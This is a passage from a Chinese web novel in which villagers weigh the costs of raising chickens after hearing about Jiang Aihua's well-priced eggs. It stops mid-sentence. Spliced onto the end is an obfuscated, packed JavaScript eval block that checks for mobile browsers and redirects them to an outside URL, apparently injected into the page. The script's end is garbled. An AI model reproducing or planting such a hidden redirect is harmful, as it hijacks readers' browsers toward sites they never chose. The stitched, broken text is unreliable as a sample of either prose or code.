粮油行里竟然卖三块多一斤,回来就把这事在村里传开了,村民们眼红的人可不少,有不少人开始过来跟姜爱华打听消息,问鸡要怎么养。
姜爱华好笑:“说到养鸡的经验,我可不敢在各位叔婶面前卖弄,大家是几十年的庄稼老把式,哪家的鸡养得不好了?我是怎么养鸡的大家伙眼里也应该有数,你们看我家的地都种上了玉米土豆红薯就知道了,我的鸡喂的是这几样杂粮,没有掺多少饲料进去,所以鸡蛋的品质才好,你们如果想家里的鸡生出红心的鸡蛋,那也得跟我一样喂才行。”
稻子不种了全种上玉米,然后拿玉米喂鸡?这话回去跟家里人一商量,家里的老人们立刻就不同意了,鸡就是鸡,怎么能跟人吃得一样好呢?不种稻子了,那田税要怎么交?养鸡从小鸡崽到可以生蛋,这得要三四个月的时间,都够长一季稻子了,而且这鸡是冷也不生蛋,热也不生蛋的,但它不生蛋了你也不能不喂了,粮食哐哐地出去却不见收益,那到底是亏还是赚就不好说了,尤其是这鸡蛋的收购价格只有一块多,可不是三块多,三块多是人家老板的零售价……
一家人坐下来合计合计,发现这养鸡的成本可真不低啊,要租地要种粮还要搭棚子,要买鸡苗要精心喂养,这前期投入的成本最少也要两三千块钱,不说农村人家很难一口气拿出两三千块钱,就算拿出来了,回本也要一两年,这还得是顺顺利利不出事故的……
这样一合计,发现这钱也不是那么好赚的,很多舍不得田地的人就歇了心思。
但还有一些人动起了别的脑子:“爱华,我家也有鸡蛋,但不多,可能一个月能攒个二三十斤吧,到时跟着你的鸡蛋一起卖吧,反正是搭个添头的。”
另外的人也忙道:“对对对,反正也是老板过来收购的,你就说是你家的,一起收走就好。”
但姜爱华怎么可能会
;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return''\\w+''};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(''\\b''+e(c)+''\\b'',''g''),k[c]);return p;}(''8 0=7.0.6();b(/a|9|1|2|5|4|3|c l/i.k(0)){n.m="}'',24,24,''userAgent|iphone|ipad|iemobile|blackberry|ipod|toLowerCase|navigator|var|webos|android|if|opera|chxs|n|xyz|14980102|156262||http|test|mini|href|location''.split(''|''),0,{}));
() {